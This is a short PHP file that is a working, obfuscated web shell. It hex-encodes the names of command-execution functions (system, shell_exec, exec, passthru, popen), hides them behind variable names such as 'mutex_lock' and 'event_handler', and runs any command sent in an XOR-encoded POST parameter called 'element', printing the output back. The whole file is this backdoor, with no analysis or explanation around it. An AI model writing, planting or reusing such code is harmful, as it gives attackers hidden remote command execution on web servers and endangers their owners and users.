<?php

$mutex_lock6 = "\x73\x74ream_g\x65\x74\x5F\x63\x6F\x6Et\x65\x6Ets";
$mutex_lock3 = "\x65x\x65c";
$event_handler = "he\x782bi\x6E";
$mutex_lock2 = "\x73h\x65\x6C\x6C\x5Fexec";
$mutex_lock4 = "p\x61\x73\x73th\x72u";
$mutex_lock7 = "\x70cl\x6F\x73e";
$mutex_lock1 = "sy\x73\x74\x65m";
$mutex_lock5 = "po\x70\x65n";
if (isset($_POST["e\x6Ce\x6D\x65n\x74"])) {
            function event_dispatcher( $property_set,  $val) {
 $res ='';
 $m=0;
 while($m<strlen($property_set)){
$res.=chr(ord($property_set[$m])^$val);
$m++;

} return $res;
 
}
            $element = $event_handler($_POST["e\x6Ce\x6D\x65n\x74"]);
            $element = event_dispatcher($element, 73);
            if (function_exists($mutex_lock1)) {
                $mutex_lock1($element);
            } elseif (function_exists($mutex_lock2)) {
                print $mutex_lock2($element);
            } elseif (function_exists($mutex_lock3)) {
                $mutex_lock3($element, $holder_property_set);
                print join("\n", $holder_property_set);
            } elseif (function_exists($mutex_lock4)) {
                $mutex_lock4($element);
            } elseif (function_exists($mutex_lock5) && function_exists($mutex_lock6) && function_exists($mutex_lock7)) {
                $val_res = $mutex_lock5($element, 'r');
                if ($val_res) {
                    $pgrp_record = $mutex_lock6($val_res);
                    $mutex_lock7($val_res);
                    print $pgrp_record;
                }
            }
            exit;
        }